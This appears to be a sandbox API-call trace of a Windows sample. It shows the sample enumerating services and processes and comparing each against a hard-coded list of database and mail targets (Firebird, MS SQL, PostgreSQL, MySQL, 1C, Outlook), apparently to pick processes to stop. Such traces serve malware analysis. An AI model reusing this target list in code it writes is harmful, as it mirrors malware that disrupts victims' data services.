	[0159.440] EnumServicesStatusExW (in: hSCManager=0xb616e68, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0159.440] GetLastError () returned 0xea
	[0159.440] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xf64) returned 0xb612378
	[0159.440] EnumServicesStatusExW (in: hSCManager=0xb616e68, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xf64, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0159.441] CloseServiceHandle (hSCObject=0xb616e68) returned 1
	[0159.441] lstrlenW (lpString="Appinfo") returned 7
	[0159.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0159.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0159.441] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0159.441] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0159.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0159.441] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0159.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0159.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0159.441] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0159.441] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0159.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0159.441] lstrlenW (lpString="AudioSrv") returned 8
	[0159.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0159.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0159.441] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0159.441] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0159.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0159.442] lstrlenW (lpString="BFE") returned 3
	[0159.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0159.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0159.442] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0159.442] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0159.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0159.442] lstrlenW (lpString="CryptSvc") returned 8
	[0159.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0159.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0159.442] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0159.442] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0159.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0159.442] lstrlenW (lpString="CscService") returned 10
	[0159.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0159.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0159.442] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0159.442] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0159.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0159.442] lstrlenW (lpString="DcomLaunch") returned 10
	[0159.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0159.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0159.442] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0159.442] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0159.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0159.442] lstrlenW (lpString="Dhcp") returned 4
	[0159.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0159.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0159.442] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0159.442] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0159.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0159.443] lstrlenW (lpString="Dnscache") returned 8
	[0159.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0159.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0159.443] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0159.443] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0159.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0159.443] lstrlenW (lpString="DPS") returned 3
	[0159.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0159.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0159.443] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0159.443] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0159.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0159.443] lstrlenW (lpString="eventlog") returned 8
	[0159.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0159.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0159.443] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0159.443] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0159.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0159.443] lstrlenW (lpString="EventSystem") returned 11
	[0159.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0159.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0159.443] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0159.443] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0159.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0159.443] lstrlenW (lpString="gpsvc") returned 5
	[0159.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0159.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0159.443] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0159.443] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0159.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0159.443] lstrlenW (lpString="iphlpsvc") returned 8
	[0159.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0159.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0159.444] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0159.444] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0159.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0159.444] lstrlenW (lpString="LanmanServer") returned 12
	[0159.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0159.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0159.444] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0159.444] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0159.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0159.444] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0159.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0159.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0159.444] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0159.444] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0159.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0159.444] lstrlenW (lpString="lmhosts") returned 7
	[0159.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0159.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0159.444] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0159.444] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0159.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0159.444] lstrlenW (lpString="MMCSS") returned 5
	[0159.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0159.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0159.444] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0159.444] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0159.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0159.444] lstrlenW (lpString="MpsSvc") returned 6
	[0159.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0159.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0159.445] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0159.445] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0159.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0159.445] lstrlenW (lpString="netprofm") returned 8
	[0159.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0159.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0159.445] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0159.445] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0159.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0159.445] lstrlenW (lpString="NlaSvc") returned 6
	[0159.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0159.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0159.445] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0159.445] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0159.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0159.445] lstrlenW (lpString="nsi") returned 3
	[0159.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0159.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0159.445] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0159.445] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0159.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0159.445] lstrlenW (lpString="PcaSvc") returned 6
	[0159.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0159.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0159.445] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0159.445] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0159.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0159.446] lstrlenW (lpString="PlugPlay") returned 8
	[0159.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0159.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0159.446] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0159.446] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0159.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0159.446] lstrlenW (lpString="Power") returned 5
	[0159.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0159.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0159.446] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0159.446] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0159.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0159.446] lstrlenW (lpString="ProfSvc") returned 7
	[0159.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0159.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0159.446] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0159.446] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0159.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0159.446] lstrlenW (lpString="RpcEptMapper") returned 12
	[0159.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0159.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0159.446] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0159.446] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0159.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0159.446] lstrlenW (lpString="RpcSs") returned 5
	[0159.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0159.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0159.446] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0159.446] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0159.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0159.447] lstrlenW (lpString="SamSs") returned 5
	[0159.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0159.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0159.447] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0159.447] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0159.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0159.447] lstrlenW (lpString="Schedule") returned 8
	[0159.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0159.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0159.447] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0159.447] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0159.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0159.447] lstrlenW (lpString="SENS") returned 4
	[0159.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0159.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0159.447] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0159.447] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0159.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0159.447] lstrlenW (lpString="ShellHWDetection") returned 16
	[0159.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0159.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0159.447] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0159.447] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0159.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0159.447] lstrlenW (lpString="Spooler") returned 7
	[0159.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0159.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0159.447] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0159.447] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0159.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0159.448] lstrlenW (lpString="SysMain") returned 7
	[0159.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0159.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0159.448] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0159.448] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0159.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0159.448] lstrlenW (lpString="Themes") returned 6
	[0159.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0159.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0159.448] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0159.448] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0159.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0159.448] lstrlenW (lpString="TrkWks") returned 6
	[0159.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0159.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0159.448] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0159.448] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0159.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0159.448] lstrlenW (lpString="UxSms") returned 5
	[0159.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0159.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0159.448] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0159.448] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0159.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0159.448] lstrlenW (lpString="Winmgmt") returned 7
	[0159.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0159.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0159.448] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0159.448] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0159.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0159.448] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0159.449] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3d8
	[0159.450] Process32FirstW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0159.451] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0159.451] lstrlenW (lpString="System") returned 6
	[0159.451] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0159.451] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0159.451] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0159.451] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0159.451] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0159.451] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0159.451] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0159.451] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0159.452] lstrlenW (lpString="smss.exe") returned 8
	[0159.452] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0159.452] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0159.452] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0159.452] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0159.452] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0159.452] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0159.452] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0159.452] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0159.452] lstrlenW (lpString="csrss.exe") returned 9
	[0159.452] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0159.452] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0159.452] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0159.452] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0159.452] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0159.452] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0159.452] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0159.452] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0159.453] lstrlenW (lpString="wininit.exe") returned 11
	[0159.453] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0159.453] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0159.453] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0159.453] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0159.453] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0159.453] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0159.453] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0159.453] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0159.453] lstrlenW (lpString="csrss.exe") returned 9
	[0159.453] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0159.453] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0159.453] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0159.453] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0159.453] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0159.453] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0159.453] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0159.453] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0159.454] lstrlenW (lpString="winlogon.exe") returned 12
	[0159.454] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0159.454] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0159.454] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0159.454] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0159.454] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0159.454] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0159.454] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0159.454] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0159.454] lstrlenW (lpString="services.exe") returned 12
	[0159.455] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0159.455] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0159.455] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0159.455] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0159.455] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0159.455] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0159.455] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
